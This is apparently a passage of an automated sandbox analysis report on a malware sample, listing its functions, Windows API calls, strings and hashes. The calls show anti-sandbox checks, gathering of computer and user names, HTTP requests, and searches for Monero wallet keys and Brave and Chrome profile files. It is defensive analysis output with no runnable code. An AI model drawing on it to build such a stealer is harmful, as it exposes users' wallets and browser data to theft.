                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 3098be050c841d28093467b13a00b2eeea855a76ecbedf8d026338b114b3c154
                                • Instruction ID: 17db261e9ce45459dd5b0763f92f994718f1e4c95317c525eb2a183882abb4a2
                                • Opcode Fuzzy Hash: 3098be050c841d28093467b13a00b2eeea855a76ecbedf8d026338b114b3c154
                                • Instruction Fuzzy Hash: FD2162B1D00208ABDF14DFA4ED4AADD7B75FB44310F108625F915A72C0DB706609DF81
                                Function 00C451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                  • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36303
                                  • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                  • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C36385
                                  • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                  • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                • Instruction ID: 9b9cc00b9739a899c52114db704eba6f94c09435564f422ca5af65f8b32b8d86
                                • Opcode Fuzzy Hash: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                • Instruction Fuzzy Hash: 27113030950108ABEB14FF61DD52AED7738BF50300F404168FC1A5B193EF30AB09EA92
                                Function 00C31110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                • ExitProcess.KERNEL32 ref: 00C31143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                • Instruction ID: 4f885f13fd2e57bff0f6a39fe4e3988c18fe059a154631ea9fa5b531d114a31c
                                • Opcode Fuzzy Hash: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                • Instruction Fuzzy Hash: 87E08670955308FFE714EBA19C0EB0C76B8AB44B02F140055F70D761C0C6B42644969A
                                Function 00C310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C310B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C310F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                • Instruction ID: 2f1178416b60e9c5da4d8fc8a2b4b5fc8350a0c48373e1057cd390b14c69acee
                                • Opcode Fuzzy Hash: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                • Instruction Fuzzy Hash: A8F0E2B1641208BFE718EAA4AC49FAEB7E8E705B15F300458F904E7280D5719F44DAA1
                                Function 00C31190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                  • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                  • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                  • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                  • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                  • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                • ExitProcess.KERNEL32 ref: 00C311C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                • Instruction ID: a4234cc96322c9c090caef9ec00301c7ae563ff523879008550502907ddae38b
                                • Opcode Fuzzy Hash: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                • Instruction Fuzzy Hash: D0E012B59143015BCA00B7B1AC0AB2E329CAB5474AF0C0939FA09F2142FB65E949A666

                                Non-executed Functions

                                Function 00C438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C438CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C438E3
                                • lstrcat.KERNEL32(?,?), ref: 00C43935
                                • StrCmpCA.SHLWAPI(?,00C50F70), ref: 00C43947
                                • StrCmpCA.SHLWAPI(?,00C50F74), ref: 00C4395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C43C67
                                • FindClose.KERNEL32(000000FF), ref: 00C43C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                • Instruction ID: 404778ecc219565c922bda3c78bf3bdf61b20afa5c36fb8d50f95d3ddbbbe026
                                • Opcode Fuzzy Hash: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                • Instruction Fuzzy Hash: 04A142B1A002189FDB24EFA5DC85FEE7378FB94301F084598E51DA6141EB759B88CF62
                                Function 00C3BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00C50B32,00C50B2B,00000000,?,?,?,00C513F4,00C50B2A), ref: 00C3BEF5
                                • StrCmpCA.SHLWAPI(?,00C513F8), ref: 00C3BF4D
                                • StrCmpCA.SHLWAPI(?,00C513FC), ref: 00C3BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00C3C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                • Instruction ID: 8d1f464f53db852cc4946b21991c02bdfbcb554744b4cd2db0ac491c5a4dfc3c
                                • Opcode Fuzzy Hash: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                • Instruction Fuzzy Hash: 3A426372950104ABEB14FB70DD96EED737DBF94300F404568F90AA6091EF34AB49DBA2
                                Function 00C44910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C4492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                • StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                • StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                • FindClose.KERNEL32(000000FF), ref: 00C44B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                • Instruction ID: a352f25004cf526c3a341c9ccad46b67003784b91eb1503246c3cc379bc01c3d
                                • Opcode Fuzzy Hash: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                • Instruction Fuzzy Hash: 9D6132B2510218AFDB24EBE1DC49FEE737CBB98701F044598E50DA6141EB719B89CF91
                                Function 00C44570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                • wsprintfA.USER32 ref: 00C445A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                • StrCmpCA.SHLWAPI(?,00C50FC4), ref: 00C445EB
                                • StrCmpCA.SHLWAPI(?,00C50FC8), ref: 00C44601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4468B
                                • FindClose.KERNEL32(000000FF), ref: 00C446A0
                                • lstrcat.KERNEL32(?,019FF2E0), ref: 00C446C5
                                • lstrcat.KERNEL32(?,019FDC60), ref: 00C446D8
                                • lstrlen.KERNEL32(?), ref: 00C446E5
                                • lstrlen.KERNEL32(?), ref: 00C446F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                • Instruction ID: fda08bea7a7377850ac70992260fc8ed6d0a70d10086858a961417ce3bbaf0f7
                                • Opcode Fuzzy Hash: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                • Instruction Fuzzy Hash: 225143B2550218AFC724EBB0DC89BED737CBB94301F444599F61DA2190EB749BC88F92
                                Function 00C43EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C43EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C43EDA
                                • StrCmpCA.SHLWAPI(?,00C50FAC), ref: 00C43F08
                                • StrCmpCA.SHLWAPI(?,00C50FB0), ref: 00C43F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4406C
                                • FindClose.KERNEL32(000000FF), ref: 00C44081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: d7380254acc4a9e0fe6fffd6fa9507c43e38a8be3382c8b8263b9b051e54673e
                                • Instruction ID: e15ac7b7fea8b75190069160d230e665734425f5aa783811955751221cacef27
                                • Opcode Fuzzy Hash: d7380254acc4a9e0fe6fffd6fa9507c43e38a8be3382c8b8263b9b051e54673e
                                • Instruction Fuzzy Hash: 975166B2900218AFDB24FBB1DC85EFE737CBB94300F044598B65DA6040DB759B898F55
                                Function 00C3ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C3ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C3ED55
                                • StrCmpCA.SHLWAPI(?,00C51538), ref: 00C3EDAB
                                • StrCmpCA.SHLWAPI(?,00C5153C), ref: 00C3EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00C3F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
